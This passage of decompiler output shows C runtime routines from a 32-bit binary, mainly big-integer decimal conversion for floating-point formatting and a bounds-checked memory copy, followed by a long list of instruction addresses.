																	_t1125 = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) >> 0x20;
																	 *(_t1235 + _t1222 * 4 - 0x3a0) = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) + _t1067;
																	asm("adc edx, 0x0");
																	_t1222 = _t1222 + 1;
																	_t1067 = _t1125;
																	__eflags = _t1222 - _v1884;
																} while (_t1222 != _v1884);
																L149:
																__eflags = _t1066;
																if(_t1066 == 0) {
																	goto L180;
																} else {
																	_t925 = _v936;
																	__eflags = _t925 - 0x73;
																	if(_t925 < 0x73) {
																		 *(_t1235 + _t925 * 4 - 0x3a0) = _t1066;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t906 =  &_v1396;
																		L188:
																		_push(_t906);
																		_push(_t1025);
																		_push( &_v932);
																		L313();
																		_t1241 =  &(_t1241[4]);
																		_t899 = 0;
																	}
																}
															}
														}
													} else {
														_t896 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t896);
														_t897 =  &_v1860;
														L179:
														_push(_t897);
														_push(_t1025);
														_push( &_v932);
														L313();
														_t1241 =  &(_t1241[4]);
														L180:
														_t899 = 1;
													}
												}
												L181:
												__eflags = _t899;
												if(_t899 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t823 =  &_v932;
													L262:
													_push(_t1025);
													_push(_t823);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t875 = _v1908 - _v1888;
												__eflags = _t875;
												_v1908 = _t875;
											} while (_t875 != 0);
											_t1061 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1156 = _v1920;
									_t1208 = _t1156;
									_t1045 = _v472;
									_v1872 = _t1208;
									__eflags = _t1045;
									if(_t1045 != 0) {
										_t1212 = 0;
										_t1160 = 0;
										__eflags = 0;
										do {
											_t813 =  *(_t1235 + _t1160 * 4 - 0x1d0);
											_t1111 = 0xa;
											_t1112 = _t813 * _t1111 >> 0x20;
											 *(_t1235 + _t1160 * 4 - 0x1d0) = _t813 * _t1111 + _t1212;
											asm("adc edx, 0x0");
											_t1160 = _t1160 + 1;
											_t1212 = _t1112;
											__eflags = _t1160 - _t1045;
										} while (_t1160 != _t1045);
										_v1896 = _t1212;
										__eflags = _t1212;
										_t1208 = _v1872;
										if(_t1212 != 0) {
											_t1054 = _v472;
											__eflags = _t1054 - 0x73;
											if(_t1054 >= 0x73) {
												__eflags = 0;
												_push(0);
												_v2408 = 0;
												_v472 = 0;
												_push( &_v2404);
												_push(_t1025);
												_push( &_v468);
												L313();
												_t1241 =  &(_t1241[4]);
											} else {
												 *(_t1235 + _t1054 * 4 - 0x1d0) = _t1112;
												_v472 = _v472 + 1;
											}
										}
										_t1156 = _t1208;
									}
									_t787 = E10004950( &_v472,  &_v936);
									_t1104 = 0xa;
									__eflags = _t787 - _t1104;
									if(_t787 != _t1104) {
										__eflags = _t787;
										if(_t787 != 0) {
											_t788 = _t787 + 0x30;
											__eflags = _t788;
											_t1208 = _t1156 + 1;
											 *_t1156 = _t788;
											_v1872 = _t1208;
											goto L282;
										} else {
											_t789 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1208 = _t1156 + 1;
										_t805 = _v936;
										 *_t1156 = 0x31;
										_v1872 = _t1208;
										__eflags = _t805;
										if(_t805 != 0) {
											_t1159 = 0;
											_t1211 = _t805;
											_t1053 = 0;
											__eflags = 0;
											do {
												_t806 =  *(_t1235 + _t1053 * 4 - 0x3a0);
												 *(_t1235 + _t1053 * 4 - 0x3a0) = _t806 * _t1104 + _t1159;
												asm("adc edx, 0x0");
												_t1053 = _t1053 + 1;
												_t1159 = _t806 * _t1104 >> 0x20;
												_t1104 = 0xa;
												__eflags = _t1053 - _t1211;
											} while (_t1053 != _t1211);
											_t1208 = _v1872;
											__eflags = _t1159;
											if(_t1159 != 0) {
												_t809 = _v936;
												__eflags = _t809 - 0x73;
												if(_t809 >= 0x73) {
													_push(0);
													_v2408 = 0;
													_v936 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v932);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t809 * 4 - 0x3a0) = _t1159;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t789 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t789;
									_t1031 = _v1916;
									__eflags = _t789;
									if(_t789 >= 0) {
										__eflags = _t1031 - 0x7fffffff;
										if(_t1031 <= 0x7fffffff) {
											_t1031 = _t1031 + _t789;
											__eflags = _t1031;
										}
									}
									_t791 = _a24 - 1;
									__eflags = _t791 - _t1031;
									if(_t791 >= _t1031) {
										_t791 = _t1031;
									}
									_t792 = _t791 + _v1920;
									_v1916 = _t792;
									__eflags = _t1208 - _t792;
									if(__eflags != 0) {
										while(1) {
											_t793 = _v472;
											__eflags = _t793;
											if(__eflags == 0) {
												goto L303;
											}
											_t1157 = 0;
											_t1209 = _t793;
											_t1049 = 0;
											__eflags = 0;
											do {
												_t794 =  *(_t1235 + _t1049 * 4 - 0x1d0);
												 *(_t1235 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1157;
												asm("adc edx, 0x0");
												_t1049 = _t1049 + 1;
												_t1157 = _t794 * 0x3b9aca00 >> 0x20;
												__eflags = _t1049 - _t1209;
											} while (_t1049 != _t1209);
											_t1210 = _v1872;
											__eflags = _t1157;
											if(_t1157 != 0) {
												_t800 = _v472;
												__eflags = _t800 - 0x73;
												if(_t800 >= 0x73) {
													__eflags = 0;
													_push(0);
													_v2408 = 0;
													_v472 = 0;
													_push( &_v2404);
													_push(_t1025);
													_push( &_v468);
													L313();
													_t1241 =  &(_t1241[4]);
												} else {
													 *(_t1235 + _t800 * 4 - 0x1d0) = _t1157;
													_v472 = _v472 + 1;
												}
											}
											_t799 = E10004950( &_v472,  &_v936);
											_t1158 = 8;
											_t1031 = _v1916 - _t1210;
											__eflags = _t1031;
											do {
												_t708 = _t799 % _v1912;
												_t799 = _t799 / _v1912;
												_t1109 = _t708 + 0x30;
												__eflags = _t1031 - _t1158;
												if(_t1031 >= _t1158) {
													 *((char*)(_t1158 + _t1210)) = _t1109;
												}
												_t1158 = _t1158 - 1;
												__eflags = _t1158 - 0xffffffff;
											} while (_t1158 != 0xffffffff);
											__eflags = _t1031 - 9;
											if(_t1031 > 9) {
												_t1031 = 9;
											}
											_t1208 = _t1210 + _t1031;
											_v1872 = _t1208;
											__eflags = _t1208 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1208 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1031 = _t1196 & 0x000fffff;
					if((_t1146 | _t1196 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0x10019a40);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1016);
						if(E10005DEF() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E10006807();
							asm("int3");
							_push(_t1235);
							_push(_t1196);
							_t1197 = _v2424;
							__eflags = _t1197;
							if(_t1197 != 0) {
								_t740 = _v0;
								__eflags = _t740;
								if(_t740 != 0) {
									_push(_t1146);
									_t1147 = _a8;
									__eflags = _t1147;
									if(_t1147 == 0) {
										L320:
										E10001E90(_t1147, _t740, 0, _a4);
										__eflags = _t1147;
										if(_t1147 != 0) {
											__eflags = _a4 - _t1197;
											if(_a4 >= _t1197) {
												_t742 = 0x16;
											} else {
												_t743 = E100068B3();
												_push(0x22);
												goto L324;
											}
										} else {
											_t743 = E100068B3();
											_push(0x16);
											L324:
											_pop(_t1199);
											 *_t743 = _t1199;
											E100067F7();
											_t742 = _t1199;
										}
									} else {
										__eflags = _a4 - _t1197;
										if(_a4 < _t1197) {
											goto L320;
										} else {
											E10010340(_t740, _t1147, _t1197);
											_t742 = 0;
										}
									}
								} else {
									_t746 = E100068B3();
									_t1200 = 0x16;
									 *_t746 = _t1200;
									E100067F7();
									_t742 = _t1200;
								}
							} else {
								_t742 = 0;
							}
							return _t742;
						} else {
							L309:
							_t1248 = _v1936;
							if(_v1936 != 0) {
								E1000E24C(_t1031, _t1248,  &_v1944);
							}
							return E10001B26(_v8 ^ _t1235);
						}
					}
				}
			}

































































































































































































































































    0x1000b629
    0x1000b630
    0x1000b634
    0x1000b63f
    0x1000b642
    0x1000b648
    0x1000b64e
    0x1000b653
    0x1000b662
    0x1000b664
    0x1000b666
    0x1000b666
    0x1000b66d
    0x1000b677
    0x1000b67c
    0x1000b67f
    0x1000b6a3
    0x1000b6a7
    0x1000b6ac
    0x1000b6ad
    0x1000b6af
    0x1000b6b1
    0x1000b6b7
    0x1000b6b7
    0x1000b6be
    0x1000b6be
    0x1000b6c1
    0x1000c971
    0x00000000
    0x1000b6c7
    0x1000b6c7
    0x1000b6c7
    0x1000b6ca
    0x1000c96a
    0x00000000
    0x1000b6d0
    0x1000b6d0
    0x1000b6d0
    0x1000b6d3
    0x1000c963
    0x00000000
    0x1000b6d9
    0x1000b6d9
    0x1000b6dc
    0x1000c95c
    0x00000000
    0x1000b6e2
    0x1000b6eb
    0x1000b6f3
    0x1000b6f6
    0x1000b6f9
    0x1000b6fc
    0x1000b702
    0x1000b70a
    0x1000b710
    0x1000b71a
    0x1000b71a
    0x1000b71d
    0x1000b725
    0x1000b72c
    0x1000b72c
    0x1000b71f
    0x1000b71f
    0x1000b721
    0x1000b734
    0x1000b73a
    0x1000b73c
    0x1000b740
    0x1000b745
    0x1000b752
    0x1000b754
    0x1000b75a
    0x1000b75f
    0x1000b760
    0x1000b761
    0x1000b76b
    0x1000b770
    0x1000b776
    0x1000b77b
    0x1000b784
    0x1000b784
    0x1000b786
    0x1000b77d
    0x1000b77d
    0x1000b782
    0x00000000
    0x00000000
    0x1000b782
    0x1000b78c
    0x1000b794
    0x1000b796
    0x1000b79f
    0x1000b7a0
    0x1000b7a6
    0x1000b7a8
    0x1000bb9b
    0x1000bba1
    0x1000bcc0
    0x1000bcc0
    0x1000bcc7
    0x1000bcc7
    0x1000bcc7
    0x1000bcce
    0x1000bcd1
    0x1000bcd8
    0x1000bcd8
    0x1000bcd3
    0x1000bcd3
    0x1000bcd3
    0x1000bcdc
    0x1000bcdd
    0x1000bcdf
    0x1000bce2
    0x1000bce5
    0x1000bce8
    0x1000bcee
    0x1000bcf1
    0x1000bcf4
    0x1000bcfe
    0x1000bcfe
    0x1000bcfe
    0x1000bcf6
    0x1000bcf6
    0x1000bcf8
    0x00000000
    0x1000bcfa
    0x1000bcfa
    0x1000bcfa
    0x1000bcf8
    0x1000bd00
    0x1000bd02
    0x1000bda3
    0x1000bda3
    0x1000bdb0
    0x1000bdb0
    0x1000bdb0
    0x1000bdb7
    0x1000bdb9
    0x1000bdc0
    0x1000bdc5
    0x1000bdc6
    0x1000bdcb
    0x1000bd08
    0x1000bd08
    0x1000bd0a
    0x00000000
    0x1000bd10
    0x1000bd12
    0x1000bd13
    0x1000bd15
    0x1000bd17
    0x1000bd17
    0x1000bd19
    0x1000bd1c
    0x1000bd24
    0x1000bd26
    0x1000bd29
    0x1000bd2f
    0x1000bd2f
    0x1000bd31
    0x1000bd3d
    0x1000bd3d
    0x1000bd3d
    0x1000bd33
    0x1000bd35
    0x1000bd35
    0x1000bd44
    0x1000bd47
    0x1000bd49
    0x1000bd50
    0x1000bd50
    0x1000bd4b
    0x1000bd4b
    0x1000bd4b
    0x1000bd58
    0x1000bd62
    0x1000bd68
    0x1000bd69
    0x1000bd6e
    0x1000bd74
    0x1000bd77
    0x00000000
    0x00000000
    0x1000bd79
    0x1000bd79
    0x1000bd81
    0x1000bd81
    0x1000bd87
    0x1000bd8e
    0x1000bd9b
    0x1000bd90
    0x1000bd90
    0x1000bd93
    0x1000bd93
    0x1000bd8e
    0x1000bd0a
    0x1000bdd7
    0x1000bde7
    0x1000bdf4
    0x1000bdf6
    0x1000bdfd
    0x1000bba7
    0x1000bba7
    0x1000bbb0
    0x1000bbb1
    0x1000bbbb
    0x1000bbc1
    0x1000bbc3
    0x1000bbc9
    0x1000bbc9
    0x1000bbcb
    0x1000bbcb
    0x1000bbd2
    0x1000bbd9
    0x00000000
    0x00000000
    0x1000bbdf
    0x1000bbe2
    0x1000bbe5
    0x00000000
    0x1000bbe7
    0x1000bbe7
    0x1000bbe7
    0x1000bbe7
    0x1000bbee
    0x1000bbf1
    0x1000bbf8
    0x1000bbf8
    0x1000bbf3
    0x1000bbf3
    0x1000bbf3
    0x1000bbfc
    0x1000bbff
    0x1000bc01
    0x1000bc03
    0x1000bc09
    0x1000bc0f
    0x1000bc11
    0x1000bc11
    0x1000bc11
    0x1000bc18
    0x1000bc18
    0x1000bc1a
    0x1000bc26
    0x1000bc26
    0x1000bc26
    0x1000bc1c
    0x1000bc1e
    0x1000bc1e
    0x1000bc2d
    0x1000bc30
    0x1000bc32
    0x1000bc39
    0x1000bc39
    0x1000bc34
    0x1000bc34
    0x1000bc34
    0x1000bc41
    0x1000bc4c
    0x1000bc52
    0x1000bc53
    0x1000bc58
    0x1000bc5e
    0x1000bc61
    0x00000000
    0x00000000
    0x1000bc63
    0x1000bc63
    0x1000bc6d
    0x1000bc78
    0x1000bc80
    0x1000bc86
    0x1000bc91
    0x1000bc97
    0x1000bc9e
    0x1000bcb1
    0x1000bcb8
    0x1000bcb8
    0x00000000
    0x1000bbe5
    0x1000bbcb
    0x00000000
    0x1000bbc3
    0x1000be00
    0x1000be00
    0x1000be06
    0x1000be0b
    0x1000be11
    0x1000be11
    0x1000be14
    0x1000be1b
    0x1000be22
    0x1000be23
    0x1000be24
    0x1000be29
    0x1000b7ae
    0x1000b7ae
    0x1000b7b7
    0x1000b7b8
    0x1000b7c2
    0x1000b7c8
    0x1000b7ca
    0x1000b9d0
    0x1000b9d8
    0x1000b9db
    0x1000b9e0
    0x1000b9e3
    0x1000b9eb
    0x1000b9ef
    0x1000b9f5
    0x1000b9fb
    0x1000ba00
    0x1000ba07
    0x1000ba08
    0x1000ba08
    0x1000ba08
    0x1000ba0f
    0x1000ba12
    0x1000ba1a
    0x1000ba20
    0x1000ba25
    0x1000ba25
    0x1000ba22
    0x1000ba22
    0x1000ba22
    0x1000ba29
    0x1000ba2a
    0x1000ba2c
    0x1000ba2f
    0x1000ba35
    0x1000ba3b
    0x1000ba3e
    0x1000ba41
    0x1000ba47
    0x1000ba4a
    0x1000ba4d
    0x1000ba57
    0x1000ba57
    0x1000ba57
    0x1000ba4f
    0x1000ba4f
    0x1000ba51
    0x00000000
    0x1000ba53
    0x1000ba53
    0x1000ba53
    0x1000ba51
    0x1000ba59
    0x1000ba5b
    0x1000bb4d
    0x1000bb4d
    0x1000bb4f
    0x1000bb54
    0x1000bb55
    0x1000bb5b
    0x1000bb67
    0x1000bb6e
    0x1000bb6f
    0x1000bb70
    0x1000bb75
    0x1000ba61
    0x1000ba61
    0x1000ba63
    0x00000000
    0x1000ba69
    0x1000ba6b
    0x1000ba6c
    0x1000ba6e
    0x1000ba70
    0x1000ba72
    0x1000ba72
    0x1000ba78
    0x1000ba7a
    0x1000ba80
    0x1000ba83
    0x1000ba91
    0x1000ba97
    0x1000ba97
    0x1000ba99
    0x1000ba9c
    0x1000baa2
    0x1000baa2
    0x1000baa4
    0x00000000
    0x00000000
    0x1000baa6
    0x1000baa8
    0x1000baae
    0x1000baae
    0x1000baaa
    0x1000baaa
    0x1000baaa
    0x1000bab3
    0x1000bab5
    0x1000babc
    0x1000babc
    0x1000bab7
    0x1000bab7
    0x1000bab7
    0x1000bae2
    0x1000bae8
    0x1000baeb
    0x1000baf1
    0x1000baf8
    0x1000baf9
    0x1000bafa
    0x1000bb00
    0x1000bb03
    0x1000bb05
    0x00000000
    0x1000bb05
    0x00000000
    0x1000bb03
    0x1000bb0d
    0x1000bb13
    0x1000bb1b
    0x1000bb1b
    0x1000bb1c
    0x1000bb1e
    0x1000bb22
    0x1000bb2a
    0x1000bb2a
    0x1000bb2a
    0x1000bb2c
    0x1000bb33
    0x1000bb38
    0x1000bb45
    0x1000bb3a
    0x1000bb3d
    0x1000bb3d
    0x1000bb38
    0x1000ba63
    0x1000bb78
    0x1000bb82
    0x1000bb88
    0x1000bb8e
    0x1000bb94
    0x1000b7d0
    0x1000b7d0
    0x1000b7d0
    0x1000b7d2
    0x1000b7d9
    0x1000b7e0
    0x00000000
    0x00000000
    0x1000b7e6
    0x1000b7e9
    0x1000b7ec
    0x00000000
    0x1000b7ee
    0x1000b7f6
    0x1000b7fb
    0x1000b800
    0x1000b801
    0x1000b803
    0x1000b80b
    0x1000b80f
    0x1000b815
    0x1000b81b
    0x1000b820
    0x1000b827
    0x1000b827
    0x1000b828
    0x1000b82b
    0x1000b833
    0x1000b839
    0x1000b83e
    0x1000b83e
    0x1000b83b
    0x1000b83b
    0x1000b83b
    0x1000b842
    0x1000b843
    0x1000b845
    0x1000b848
    0x1000b84e
    0x1000b854
    0x1000b857
    0x1000b85a
    0x1000b860
    0x1000b863
    0x1000b866
    0x1000b870
    0x1000b870
    0x1000b870
    0x1000b868
    0x1000b868
    0x1000b86a
    0x00000000
    0x1000b86c
    0x1000b86c
    0x1000b86c
    0x1000b86a
    0x1000b872
    0x1000b874
    0x1000b969
    0x1000b969
    0x1000b96b
    0x1000b970
    0x1000b971
    0x1000b977
    0x1000b983
    0x1000b98a
    0x1000b98b
    0x1000b98c
    0x1000b991
    0x1000b87a
    0x1000b87a
    0x1000b87c
    0x00000000
    0x1000b882
    0x1000b884
    0x1000b885
    0x1000b887
    0x1000b889
    0x1000b88b
    0x1000b88b
    0x1000b891
    0x1000b893
    0x1000b899
    0x1000b89c
    0x1000b8aa
    0x1000b8b0
    0x1000b8b0
    0x1000b8b2
    0x1000b8b5
    0x1000b8bb
    0x1000b8bb
    0x1000b8bd
    0x00000000
    0x00000000
    0x1000b8bf
    0x1000b8c1
    0x1000b8c7
    0x1000b8c7
    0x1000b8c3
    0x1000b8c3
    0x1000b8c3
    0x1000b8cc
    0x1000b8ce
    0x1000b8db
    0x1000b8db
    0x1000b8d0
    0x1000b8d6
    0x1000b8d6
    0x1000b8f9
    0x1000b901
    0x1000b908
    0x1000b90f
    0x1000b910
    0x1000b913
    0x1000b919
    0x1000b91f
    0x1000b922
    0x1000b924
    0x00000000
    0x1000b924
    0x00000000
    0x1000b922
    0x1000b92c
    0x1000b932
    0x1000b932
    0x1000b938
    0x1000b93a
    0x1000b944
    0x1000b946
    0x1000b946
    0x1000b946
    0x1000b948
    0x1000b94f
    0x1000b954
    0x1000b961
    0x1000b956
    0x1000b959
    0x1000b959
    0x1000b954
    0x1000b87c
    0x1000b994
    0x1000b99f
    0x1000b9a0
    0x1000b9a1
    0x1000b9a7
    0x1000b9ad
    0x1000b9b3
    0x1000b9b3
    0x00000000
    0x1000b7ec
    0x00000000
    0x1000b7d2
    0x1000b9b4
    0x1000b9ba
    0x1000b9c1
    0x1000b9c2
    0x1000b9c3
    0x1000b9c8
    0x1000b9c8
    0x1000be2c
    0x1000be36
    0x1000be37
    0x1000be3d
    0x1000be3f
    0x1000c2a8
    0x1000c2aa
    0x1000c2ac
    0x1000c2b2
    0x1000c2b4
    0x1000c2ba
    0x1000c2bc
    0x1000c60e
    0x1000c60e
    0x1000c610
    0x1000c616
    0x1000c61d
    0x1000c623
    0x1000c625
    0x1000c6c3
    0x1000c6c3
    0x1000c6c5
    0x1000c6c6
    0x1000c6cc
    0x00000000
    0x1000c62b
    0x1000c62b
    0x1000c62e
    0x1000c634
    0x1000c63a
    0x1000c63c
    0x1000c642
    0x1000c644
    0x1000c644
    0x1000c646
    0x1000c646
    0x1000c64f
    0x1000c656
    0x1000c65c
    0x1000c65f
    0x1000c660
    0x1000c662
    0x1000c662
    0x1000c666
    0x1000c668
    0x1000c66a
    0x1000c670
    0x1000c673
    0x00000000
    0x1000c675
    0x1000c675
    0x1000c67c
    0x1000c67c
    0x1000c673
    0x1000c668
    0x1000c63c
    0x1000c62e
    0x1000c625
    0x1000c2c2
    0x1000c2c2
    0x1000c2c2
    0x1000c2c5
    0x1000c2c9
    0x1000c2c9
    0x1000c2ca
    0x1000c2dc
    0x1000c2e9
    0x1000c2f8
    0x1000c322
    0x1000c327
    0x1000c32d
    0x1000c330
    0x1000c336
    0x1000c339
    0x1000c3d2
    0x1000c3d9
    0x1000c457
    0x1000c45d
    0x1000c463
    0x1000c466
    0x1000c468
    0x1000c4f1
    0x1000c46e
    0x1000c46e
    0x1000c474
    0x1000c474
    0x1000c47a
    0x1000c480
    0x1000c482
    0x1000c484
    0x1000c484
    0x1000c48a
    0x1000c490
    0x1000c492
    0x1000c49a
    0x1000c49a
    0x1000c4a0
    0x1000c4a2
    0x1000c4a4
    0x1000c4aa
    0x1000c4ac
    0x1000c5c3
    0x1000c5c5
    0x1000c5cb
    0x1000c5cb
    0x1000c5ce
    0x1000c5cf
    0x00000000
    0x1000c4b2
    0x1000c4b8
    0x1000c4b8
    0x1000c4ba
    0x1000c4c0
    0x1000c4c3
    0x1000c4ca
    0x1000c4d0
    0x1000c4d2
    0x1000c4f9
    0x1000c4fb
    0x1000c4fd
    0x1000c4ff
    0x1000c505
    0x1000c50b
    0x1000c5a5
    0x1000c5a5
    0x1000c5a8
    0x00000000
    0x1000c5ae
    0x1000c5ae
    0x1000c5b4
    0x00000000
    0x1000c5b4
    0x1000c511
    0x1000c511
    0x1000c511
    0x1000c514
    0x00000000
    0x00000000
    0x1000c516
    0x1000c518
    0x1000c51a
    0x1000c523
    0x1000c523
    0x1000c525
    0x1000c52b
    0x1000c52b
    0x1000c537
    0x1000c542
    0x1000c545
    0x1000c552
    0x1000c555
    0x1000c556
    0x1000c557
    0x1000c55d
    0x1000c55f
    0x1000c565
    0x1000c56b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000c56d
    0x1000c56d
    0x1000c56d
    0x1000c56f
    0x00000000
    0x00000000
    0x1000c571
    0x1000c574
    0x00000000
    0x1000c57a
    0x1000c57a
    0x1000c57c
    0x1000c57e
    0x1000c57e
    0x1000c57e
    0x1000c586
    0x1000c589
    0x1000c589
    0x1000c58f
    0x1000c591
    0x1000c593
    0x1000c59a
    0x1000c5a0
    0x1000c5a2
    0x00000000
    0x1000c5a2
    0x00000000
    0x1000c574
    0x00000000
    0x1000c56d
    0x00000000
    0x1000c511
    0x1000c4d4
    0x1000c4d4
    0x1000c4d6
    0x1000c4dc
    0x1000c4e3
    0x1000c4e3
    0x1000c4e6
    0x1000c4e6
    0x00000000
    0x1000c4d6
    0x00000000
    0x1000c5ba
    0x1000c5ba
    0x1000c5bb
    0x1000c5bb
    0x00000000
    0x1000c4c0
    0x1000c3db
    0x1000c3db
    0x1000c3e6
    0x1000c3ed
    0x1000c3f3
    0x1000c3fa
    0x1000c3fb
    0x1000c3fc
    0x1000c401
    0x1000c404
    0x1000c406
    0x00000000
    0x1000c40c
    0x1000c40c
    0x1000c40f
    0x00000000
    0x1000c415
    0x1000c415
    0x1000c41c
    0x00000000
    0x1000c422
    0x1000c428
    0x1000c42a
    0x1000c430
    0x1000c430
    0x1000c432
    0x1000c432
    0x1000c434
    0x1000c43d
    0x1000c444
    0x1000c447
    0x1000c448
    0x1000c44a
    0x1000c44a
    0x00000000
    0x1000c452
    0x1000c41c
    0x1000c40f
    0x1000c406
    0x1000c33f
    0x1000c33f
    0x1000c345
    0x1000c347
    0x1000c363
    0x1000c366
    0x00000000
    0x1000c36c
    0x1000c36c
    0x1000c373
    0x00000000
    0x1000c379
    0x1000c37f
    0x1000c381
    0x1000c387
    0x1000c387
    0x1000c389
    0x1000c389
    0x1000c38b
    0x1000c394
    0x1000c39b
    0x1000c39e
    0x1000c39f
    0x1000c3a1
    0x1000c3a1
    0x1000c3a9
    0x1000c3a9
    0x1000c3ab
    0x00000000
    0x1000c3b1
    0x1000c3b1
    0x1000c3b7
    0x1000c3ba
    0x1000c684
    0x1000c686
    0x1000c687
    0x1000c68d
    0x1000c699
    0x1000c6a0
    0x1000c6a1
    0x1000c6a2
    0x1000c6a7
    0x1000c6aa
    0x1000c3c0
    0x1000c3c0
    0x1000c3c7
    0x00000000
    0x1000c3c7
    0x1000c3ba
    0x1000c3ab
    0x1000c373
    0x1000c349
    0x1000c349
    0x1000c34b
    0x1000c351
    0x1000c357
    0x1000c358
    0x1000c5d5
    0x1000c5d5
    0x1000c5dc
    0x1000c5dd
    0x1000c5de
    0x1000c5e3
    0x1000c5e6
    0x1000c5e6
    0x1000c5e6
    0x1000c347
    0x1000c5e8
    0x1000c5e8
    0x1000c5ea
    0x1000c6b1
    0x1000c6b8
    0x1000c6bf
    0x1000c6d2
    0x1000c6d8
    0x1000c6d9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000c5f0
    0x1000c5f6
    0x1000c5f6
    0x1000c5fc
    0x1000c5fc
    0x1000c608
    0x00000000
    0x1000c608
    0x1000be45
    0x1000be45
    0x1000be47
    0x1000be4d
    0x1000be4f
    0x1000be55
    0x1000be57
    0x1000c1ce
    0x1000c1ce
    0x1000c1d0
    0x1000c1d6
    0x1000c1dd
    0x1000c1df
    0x1000c23e
    0x1000c241
    0x1000c247
    0x1000c24d
    0x1000c253
    0x1000c255
    0x1000c25b
    0x1000c25d
    0x1000c25d
    0x1000c25f
    0x1000c25f
    0x1000c261
    0x1000c26a
    0x1000c271
    0x1000c274
    0x1000c275
    0x1000c277
    0x1000c277
    0x1000c27f
    0x1000c281
    0x1000c287
    0x1000c28d
    0x1000c290
    0x00000000
    0x1000c296
    0x1000c296
    0x1000c29d
    0x1000c29d
    0x1000c290
    0x1000c281
    0x1000c255
    0x1000c1e1
    0x1000c1e1
    0x1000c1e3
    0x1000c1e9
    0x1000c1ef
    0x00000000
    0x1000c1ef
    0x1000c1df
    0x1000be5d
    0x1000be5d
    0x1000be5d
    0x1000be60
    0x1000be64
    0x1000be64
    0x1000be65
    0x1000be77
    0x1000be84
    0x1000be93
    0x1000bebd
    0x1000bec2
    0x1000bec8
    0x1000becb
    0x1000bed1
    0x1000bed4
    0x1000bf50
    0x1000bf57
    0x1000c01b
    0x1000c021
    0x1000c027
    0x1000c02a
    0x1000c02c
    0x1000c0b5
    0x1000c032
    0x1000c032
    0x1000c038
    0x1000c038
    0x1000c03e
    0x1000c044
    0x1000c046
    0x1000c048
    0x1000c048
    0x1000c04e
    0x1000c054
    0x1000c056
    0x1000c05e
    0x1000c05e
    0x1000c064
    0x1000c066
    0x1000c068
    0x1000c06e
    0x1000c070
    0x1000c187
    0x1000c189
    0x1000c18f
    0x1000c18f
    0x00000000
    0x1000c076
    0x1000c07c
    0x1000c07c
    0x1000c07e
    0x1000c084
    0x1000c087
    0x1000c08e
    0x1000c094
    0x1000c096
    0x1000c0bd
    0x1000c0bf
    0x1000c0c1
    0x1000c0c3
    0x1000c0c9
    0x1000c0cf
    0x1000c169
    0x1000c169
    0x1000c16c
    0x00000000
    0x1000c172
    0x1000c172
    0x1000c178
    0x00000000
    0x1000c178
    0x1000c0d5
    0x1000c0d5
    0x1000c0d5
    0x1000c0d8
    0x00000000
    0x00000000
    0x1000c0da
    0x1000c0dc
    0x1000c0de
    0x1000c0e7
    0x1000c0e7
    0x1000c0e9
    0x1000c0ef
    0x1000c0ef
    0x1000c0fb
    0x1000c106
    0x1000c109
    0x1000c116
    0x1000c119
    0x1000c11a
    0x1000c11b
    0x1000c121
    0x1000c123
    0x1000c129
    0x1000c12f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000c131
    0x1000c131
    0x1000c131
    0x1000c133
    0x00000000
    0x00000000
    0x1000c135
    0x1000c138
    0x1000c1f2
    0x1000c1f2
    0x1000c1f4
    0x1000c1fa
    0x1000c200
    0x1000c201
    0x00000000
    0x1000c13e
    0x1000c13e
    0x1000c140
    0x1000c142
    0x1000c142
    0x1000c142
    0x1000c14a
    0x1000c14d
    0x1000c14d
    0x1000c153
    0x1000c155
    0x1000c157
    0x1000c15e
    0x1000c164
    0x1000c166
    0x00000000
    0x1000c166
    0x00000000
    0x1000c138
    0x00000000
    0x1000c131
    0x00000000
    0x1000c0d5
    0x1000c098
    0x1000c098
    0x1000c09a
    0x1000c0a0
    0x1000c0a7
    0x1000c0a7
    0x1000c0aa
    0x1000c0aa
    0x00000000
    0x1000c09a
    0x00000000
    0x1000c17e
    0x1000c17e
    0x1000c17f
    0x1000c17f
    0x00000000
    0x1000c084
    0x1000bf5d
    0x1000bf5d
    0x1000bf68
    0x1000bf6f
    0x1000bf75
    0x1000bf7c
    0x1000bf7d
    0x1000bf7e
    0x1000bf83
    0x1000bf86
    0x1000bf88
    0x1000bfa4
    0x1000bfa7
    0x00000000
    0x1000bfad
    0x1000bfad
    0x1000bfb4
    0x00000000
    0x1000bfba
    0x1000bfc0
    0x1000bfc2
    0x1000bfc8
    0x1000bfc8
    0x1000bfca
    0x1000bfca
    0x1000bfcc
    0x1000bfd5
    0x1000bfdc
    0x1000bfdf
    0x1000bfe0
    0x1000bfe2
    0x1000bfe2
    0x00000000
    0x1000bfca
    0x1000bfb4
    0x1000bf8a
    0x1000bf8c
    0x1000bf92
    0x1000bf98
    0x1000bf99
    0x00000000
    0x1000bf99
    0x1000bf88
    0x1000bed6
    0x1000bed6
    0x1000bedc
    0x1000bede
    0x1000bef3
    0x1000bef6
    0x00000000
    0x1000befc
    0x1000befc
    0x1000bf03
    0x00000000
    0x1000bf09
